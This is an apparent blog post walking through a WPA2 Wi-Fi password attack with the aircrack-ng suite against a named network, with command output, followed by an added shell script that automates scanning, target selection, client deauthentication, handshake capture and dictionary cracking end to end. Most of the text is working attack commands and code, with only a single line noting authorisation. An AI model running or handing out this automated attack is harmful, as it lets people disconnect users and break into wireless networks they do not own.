Wireless router attack, hands-on

1, Preparation stage

  • Attack host: Kali Linux
  • Attack tools: aircrack-ng, airodump-ng, airmon-ng and aireplay-ng (the aircrack-ng suite)
  • One wireless adapter that supports monitor mode and packet injection
You can check that the adapter is recognized with the command: sudo iwconfig.

My network card name is wlan0

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

2, Attack phase

1. Stop NetworkManager and kill interfering processes

Stop NetworkManager:

sudo service network-manager stop

Kill the processes that airmon-ng knows will fight over the radio (wpa_supplicant, dhclient and similar):

sudo airmon-ng check kill

Neither of these commands renames the interface: the change from wlan0 to wlan0mon is made by airmon-ng start in step 2. The iwconfig output below was taken after monitor mode had already been enabled, which is why wlan0mon is already present:

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

2. Enable monitor mode on the adapter

In monitor mode the adapter passes every 802.11 frame it hears on the current channel to the host, not only frames addressed to it, which is what lets it observe nearby access points and their clients.

Syntax: sudo airmon-ng start <interface>

On a fresh interface this is run as sudo airmon-ng start wlan0, and airmon-ng creates wlan0mon. In this walkthrough it was run against wlan0mon, so the output reports that monitor mode is already enabled:

sudo airmon-ng start wlan0mon

Output like the following means monitor mode is on:

root@kali:~# sudo airmon-ng start wlan0mon

PHY     Interface       Driver          Chipset

phy0    wlan0mon        rt2800usb       Ralink Technology, Corp. RT2870/RT3070

                (mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)

3. Scan for nearby networks

airodump-ng hops across channels and lists every access point and client the adapter can hear; range depends on the adapter and antenna. The listing gives each network's MAC address (BSSID), channel (CH), network name (ESSID), encryption (ENC, CIPHER) and authentication (AUTH). For the attack that follows you need the BSSID, the channel, and whether any stations are associated with the target.

Syntax: sudo airodump-ng <interface>

sudo airodump-ng wlan0mon

When the target network appears, press CTRL+C to stop. The target here is the network named CMCC-QingFeng:

root@kali:~# airodump-ng wlan0mon

 CH 13 ][ Elapsed: 26 mins ][ 2020-08-15 23:57                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                          
 80:54:6A:6C:BA:C0  -50      407     4907   40   1  130   WPA2 CCMP   PSK  CMCC-QingFeng                                                  
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                        
 (not associated)   22:C9:4E:48:C1:16  -78    0 - 1      0       12
 80:54:6A:6C:BA:C0  38:37:8B:07:71:69  -18    0e- 6      0      534
 80:54:6A:6C:BA:C0  7C:B3:7B:95:BA:50  -62    0e- 0e     8     2476                                                                       
 80:54:6A:6C:BA:C0  F4:70:AB:95:A1:14  -78    0e- 1      0     1375                                                                       
 80:54:6A:6C:BA:C0  70:C9:4E:48:C1:16  -76    0e- 1    396     2485         CMCC-QingFeng                                                 

4. Capture the handshake

This step locks the adapter onto the target's channel and writes everything it hears from that BSSID to a capture file. The goal is to record the WPA2 4-way handshake that a client performs when it (re)connects; that handshake is what aircrack-ng later tests the dictionary against. Leave this running in its own terminal for the whole of step 5.

sudo airodump-ng -c <channel> -w <output prefix> --bssid <BSSID> <interface>

Parameter description:

  • -c: channel of the target (the CH column from step 3)
  • -w: prefix for the output files; airodump-ng appends a counter and extension, so /root/admin becomes /root/admin-01.cap
  • --bssid: MAC address of the target access point; only frames to or from it are recorded


 sudo airodump-ng -c 1 -w /root/admin --bssid  80:54:6A:6C:BA:C0   wlan0mon

5. Deauthenticate the clients

aireplay-ng sends forged 802.11 deauthentication frames carrying the access point's address. Every associated client that receives them drops its connection; when a client reconnects it repeats the 4-way handshake, and the airodump-ng session from step 4 records it. Once that happens, airodump-ng prints WPA handshake: 80:54:6A:6C:BA:C0 in the top-right corner of its window (that screen is not shown here). The deauthentication is not itself the crack: with WPA2-PSK the captured handshake still has to be attacked offline, and success depends on the dictionary and on the speed of the cracking host.

sudo aireplay-ng -0 <count> -a <BSSID> <interface>

Parameter description:

  • -0: deauthentication attack mode
  • count: number of deauthentication bursts to send (0 means keep sending until stopped)
  • -a: BSSID of the target access point
  • interface: your monitor-mode interface, as shown by sudo iwconfig

Keep the airodump-ng terminal from step 4 open. Open a new terminal and run the following command against the router. While it runs, no client can stay connected to the router; a client that was connected is kicked off as soon as the command executes, and how long the disruption lasts depends on the count. In the following example, my count is 5.

sudo aireplay-ng -0  5  -a   80:54:6A:6C:BA:C0  wlan0mon
root@kali:~# sudo aireplay-ng -0  5  -a   80:54:6A:6C:BA:C0  wlan0mon
00:34:39  Waiting for beacon frame (BSSID: 80:54:6A:6C:BA:C0) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
00:34:39  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]

Note: this command forces every client of that access point offline. Remember: only run it against networks you own or are authorized to test; anything else is illegal.

6. WiFi password cracking

This step runs the dictionary against the captured handshake. Whether it succeeds depends on the dictionary actually containing the passphrase and on the speed of the cracking host, so be patient. aircrack-ng will not attempt a crack if the file holds no handshake; if it reports none, repeat step 5 with the step 4 capture still running.

Syntax: sudo aircrack-ng -w <dictionary path> <capture file>

With the prefix used in step 4, the capture file is /root/admin-01.cap.
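The whole procedure above, as an added example that is not part of the original post: a POSIX shell script that chains steps 1 to 6, parses the CSV file that airodump-ng writes alongside its screen output to pull out the BSSID, channel and an associated client (so nothing is copied off the screen by hand), validates the BSSID, and derives the capture file name from the -w prefix. It goes slightly beyond the post by preferring a targeted deauth (-c) of one associated client, as aireplay-ng's own notice suggests. The interface name wlan0, the wordlist path /usr/share/wordlists/rockyou.txt, the /tmp/scan prefix and the embedded sample CSV are all assumptions; the sample CSV is constructed to mirror the scan above and is not a real capture.

```shell
#!/bin/sh
# Added example, not from the original post: POSIX-sh helpers that chain the
# six steps above and pull the BSSID and channel out of airodump-ng's CSV
# output instead of copying them off the screen. Assumptions: the aircrack-ng
# suite and coreutils timeout are installed, the adapter is wlan0, and the
# wordlist path below exists. Running it for real needs root.
set -eu

IFACE="${IFACE:-wlan0}"                    # interface before monitor mode
MON_IFACE="${MON_IFACE:-${IFACE}mon}"      # airmon-ng start renames it to this
CAPTURE_PREFIX="${CAPTURE_PREFIX:-/root/admin}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"   # assumed path
DEAUTH_BURSTS="${DEAUTH_BURSTS:-5}"

# Constructed sample in the layout of the <prefix>-01.csv file airodump-ng -w
# writes, mirroring the scan above (not a real capture): AP table, blank
# line, station table.
SAMPLE_CSV=$(cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
80:54:6A:6C:BA:C0, 2020-08-15 23:31:10, 2020-08-15 23:57:02,  1, 130, WPA2, CCMP, PSK, -50,      407,     4907,   0.  0.  0.  0,  13, CMCC-QingFeng, 
AA:BB:CC:DD:EE:01, 2020-08-15 23:31:12, 2020-08-15 23:56:58,  6,  54, WPA2, CCMP, PSK, -81,       88,       12,   0.  0.  0.  0,   8, OtherNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
22:C9:4E:48:C1:16, 2020-08-15 23:40:01, 2020-08-15 23:55:30, -78,       12, (not associated), 
38:37:8B:07:71:69, 2020-08-15 23:31:15, 2020-08-15 23:57:00, -18,      534, 80:54:6A:6C:BA:C0, 
70:C9:4E:48:C1:16, 2020-08-15 23:35:00, 2020-08-15 23:57:01, -76,     2485, 80:54:6A:6C:BA:C0, CMCC-QingFeng
EOF
)

# Reject anything that is not a colon-separated 48-bit MAC before it is
# handed to aireplay-ng or airodump-ng.
bssid_is_valid() {
    printf '%s' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# airodump-ng -w PREFIX writes PREFIX-01.cap and bumps the counter on each
# rerun; this returns the path for run number N (default 1).
cap_path() {
    printf '%s-%02d.cap\n' "$1" "${2:-1}"
}

# Read an airodump-ng CSV on stdin and print "BSSID CHANNEL" for an ESSID
# (fields 1, 4 and 14 of the AP table, which ends at the station header).
# Caveat: an ESSID containing a comma shifts the fields and will not match.
find_target() {
    awk -F',' -v essid="$1" '
        /^Station MAC/ { exit }
        NF >= 14 {
            for (i = 1; i <= NF; i++) gsub(/^ +| +$/, "", $i)
            if ($14 == essid) { print $1, $4; exit }
        }'
}

# Print the station MACs associated to a BSSID (fields 1 and 6 of the
# station table), for the targeted -c deauth that aireplay-ng recommends.
find_clients() {
    awk -F',' -v bssid="$1" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && NF >= 6 {
            for (i = 1; i <= NF; i++) gsub(/^ +| +$/, "", $i)
            if ($6 == bssid) print $1
        }'
}

# Steps 1 to 6 end to end; nothing here runs at load time.
run_attack() {            # usage: run_attack ESSID [scan seconds]
    essid="$1"; scan_seconds="${2:-30}"
    service network-manager stop                 # step 1
    airmon-ng check kill
    airmon-ng start "$IFACE"                     # step 2: creates $MON_IFACE
    # step 3: bounded scan written as CSV; SIGINT is what Ctrl+C would send
    rm -f /tmp/scan-*.csv                        # so the file is scan-01.csv
    timeout -s INT "$scan_seconds" airodump-ng -w /tmp/scan \
        --output-format csv "$MON_IFACE" >/dev/null 2>&1 || true
    target=$(find_target "$essid" < /tmp/scan-01.csv)
    [ -n "$target" ] || { echo "no AP named $essid seen" >&2; return 1; }
    bssid=${target%% *}; channel=${target##* }
    bssid_is_valid "$bssid" || { echo "bad BSSID $bssid" >&2; return 1; }
    # step 4: lock the channel and record the handshake in the background
    airodump-ng -c "$channel" --bssid "$bssid" -w "$CAPTURE_PREFIX" \
        "$MON_IFACE" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5
    # step 5: deauth one associated client if the scan saw one (more reliable
    # than broadcast), else fall back to the broadcast deauth from the post
    client=$(find_clients "$bssid" < /tmp/scan-01.csv | head -n 1)
    if [ -n "$client" ]; then
        aireplay-ng -0 "$DEAUTH_BURSTS" -a "$bssid" -c "$client" "$MON_IFACE"
    else
        aireplay-ng -0 "$DEAUTH_BURSTS" -a "$bssid" "$MON_IFACE"
    fi
    sleep 10; kill "$dump_pid"
    # step 6: aircrack-ng exits without cracking when the file holds no
    # handshake, so a failure here means repeating step 5 with step 4 running
    aircrack-ng -w "$WORDLIST" -b "$bssid" "$(cap_path "$CAPTURE_PREFIX")"
}

if [ "${1:-}" = "run" ]; then run_attack "${2:?ESSID required}"; fi
```

Run it as root with sh script.sh run CMCC-QingFeng. Without the run argument the script only defines its helpers, which is how find_target and find_clients can be exercised against the embedded sample without a radio. Parsing the CSV rather than the screen is what makes the sequence repeatable, and handing aireplay-ng a real associated client with -c is both more reliable at provoking a reconnect and less disruptive than deauthenticating every client with a broadcast.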


Tags: security Router wifi

Posted by pradee on Sun, 22 May 2022 11:24:31 +0300